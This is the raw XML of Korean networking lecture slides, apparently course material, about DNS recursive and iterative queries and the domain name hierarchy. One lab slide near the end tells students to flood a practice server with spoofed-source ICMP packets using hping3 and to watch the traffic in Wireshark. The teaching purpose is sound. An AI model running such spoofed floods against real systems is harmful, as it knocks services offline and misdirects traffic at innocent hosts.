          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C78D2CE-9C66-4E88-A6BD-91A464787728}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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10" name="화살표: 오른쪽 9">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BA49A6F-D13C-4656-A3EE-35EEE50A35D5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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4" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97C31125-175B-41E5-8957-CB9F98BCE6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493995"/>
            <a:ext cx="7620000" cy="523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78021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E60E50-7DA3-41F4-B92E-B8A0C30C5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sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/Theory/T32 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 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DNS 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재귀 쿼리</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="화살표: 오른쪽 6">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC876A3B-2146-4C09-A591-885C34BCB344}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="580444" y="596349"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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DCD5C6C-58D3-48F4-93FF-AAD76C081B5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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717396D8-C5C9-4505-A138-9C88EFABF131}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C78D2CE-9C66-4E88-A6BD-91A464787728}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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10" name="화살표: 오른쪽 9">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BA49A6F-D13C-4656-A3EE-35EEE50A35D5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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28" name="Picture 4" descr="컴퓨터 네트워크 39장 - 도메인 네임 스페이스(Domain Name Space) -">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAD8057E-801F-454D-A530-487AB48CD0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1920" y="1690688"/>
            <a:ext cx="4955337" cy="4826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 descr="컴퓨터 네트워크 39장 - 도메인 네임 스페이스(Domain Name Space) -">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AAD7A59-7C0F-45EF-A52D-0320F360C0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5492" y="1603603"/>
            <a:ext cx="2133600" cy="458152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16D7BF03-1954-41FB-BC68-333CB91F4D04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3494314" y="5641521"/>
            <a:ext cx="4661807" cy="31840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B360F30F-233E-4C66-A2E9-1DC5DAF274B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10665277" y="5431393"/>
            <a:ext cx="862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level 4</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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1E78D56-A556-40ED-94A9-8E6AF5628F97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10646226" y="2400737"/>
            <a:ext cx="8626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level 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=TLD</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" alt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956B1B1-97A5-4074-8369-8F55114373D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10646226" y="3342939"/>
            <a:ext cx="8626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level 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=SLD</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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1B9C85E-2B90-4EEF-9394-E6A07A429C86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10646227" y="4403449"/>
            <a:ext cx="862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level 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735381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E60E50-7DA3-41F4-B92E-B8A0C30C5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sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/Theory/T32 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 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DNS 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재귀 쿼리</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="화살표: 오른쪽 6">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC876A3B-2146-4C09-A591-885C34BCB344}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="580444" y="596349"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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DCD5C6C-58D3-48F4-93FF-AAD76C081B5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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717396D8-C5C9-4505-A138-9C88EFABF131}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C78D2CE-9C66-4E88-A6BD-91A464787728}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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10" name="화살표: 오른쪽 9">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BA49A6F-D13C-4656-A3EE-35EEE50A35D5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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5132" name="Picture 12" descr="반복적 질의 2단계">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAD7032C-1F53-41D9-8AE1-9E4411349A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5077" y="2000251"/>
            <a:ext cx="7597443" cy="3639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041FED53-C3A7-4ACA-B94B-70E1138E1585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7837714" y="3780064"/>
            <a:ext cx="816429" cy="326572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93315E3D-1D4F-4C71-93C2-A47D7EFD3D3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7519307" y="3665764"/>
            <a:ext cx="318407" cy="2286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6609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6" name="Picture 6" descr="DNS - 여러분이 google.com을 칠 때 - 웹 부트캠퍼를 위한 컴퓨터 과학">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAAADBC9-C6B3-446A-A5DD-BD78602687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5077" y="2000250"/>
            <a:ext cx="7597443" cy="3639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25E60E50-7DA3-41F4-B92E-B8A0C30C5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sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/Theory/T32 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 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DNS 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재귀 쿼리</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="화살표: 오른쪽 6">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC876A3B-2146-4C09-A591-885C34BCB344}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="580444" y="596349"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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DCD5C6C-58D3-48F4-93FF-AAD76C081B5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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717396D8-C5C9-4505-A138-9C88EFABF131}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C78D2CE-9C66-4E88-A6BD-91A464787728}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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10" name="화살표: 오른쪽 9">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BA49A6F-D13C-4656-A3EE-35EEE50A35D5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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313132D2-2E2B-417B-AFD8-B676EE519230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7862207" y="4212771"/>
            <a:ext cx="767443" cy="1159329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D9A8404-3F1E-449B-8198-C73D4CF6F2DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="4098471"/>
            <a:ext cx="318407" cy="2286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9728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반복적 질의 4단계">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89F58ABF-06D0-48AA-AD87-E74396685D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5077" y="2008413"/>
            <a:ext cx="7567294" cy="3639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25E60E50-7DA3-41F4-B92E-B8A0C30C5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sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/Theory/T32 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 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DNS 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재귀 쿼리</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="화살표: 오른쪽 6">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC876A3B-2146-4C09-A591-885C34BCB344}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="580444" y="596349"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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DCD5C6C-58D3-48F4-93FF-AAD76C081B5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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717396D8-C5C9-4505-A138-9C88EFABF131}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C78D2CE-9C66-4E88-A6BD-91A464787728}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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10" name="화살표: 오른쪽 9">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BA49A6F-D13C-4656-A3EE-35EEE50A35D5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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755D36D2-9494-4109-B0F8-75A9BCB82EF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1836571" y="5760534"/>
            <a:ext cx="82381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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>서버는 재귀적 질의와 반복적 질의 두가지의 시스템이 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr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예시는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>재귀적 질의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>시스템 이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-K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38779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E60E50-7DA3-41F4-B92E-B8A0C30C5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sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/Theory/T32 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 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DNS 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쿼리의 타입</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="화살표: 오른쪽 6">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC876A3B-2146-4C09-A591-885C34BCB344}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="580444" y="596349"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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DCD5C6C-58D3-48F4-93FF-AAD76C081B5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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717396D8-C5C9-4505-A138-9C88EFABF131}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C78D2CE-9C66-4E88-A6BD-91A464787728}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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10" name="화살표: 오른쪽 9">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BA49A6F-D13C-4656-A3EE-35EEE50A35D5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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E8264202-C8A2-4E1E-BEB8-2ABF183551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4235" y="1764674"/>
            <a:ext cx="7688993" cy="332865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7CF69EE-3687-4A7C-859E-B4395462B9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1240" y="5033283"/>
            <a:ext cx="7677150" cy="108585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FCABF6F-B4BF-45D9-948C-4B9E6B2D72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1240" y="6048623"/>
            <a:ext cx="7458075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9284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화살표: 오른쪽 8">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DC0363-5748-4238-A24E-3E0F461FCB92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="134367" y="97585"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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2DF244-1E45-44A0-B32E-616FEC167CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="368998"/>
            <a:ext cx="5616792" cy="6120000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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실습 서버를 대상으로 데이터 크기가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>100 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>바이트인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>플러딩</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>    # hping3 –a 192.168.99.11 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –d 100 10.10.1.101</a:t>
            </a:r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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> 2. Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>192.168.99.11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 패킷이 나가는지 확인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4C33198-2E58-4A38-8153-C72034623E33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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1BD440D7-A4B6-422E-BEF0-DA734161F7A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C45BEB1-A639-4FC8-BFA8-B46B8EC4E337}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
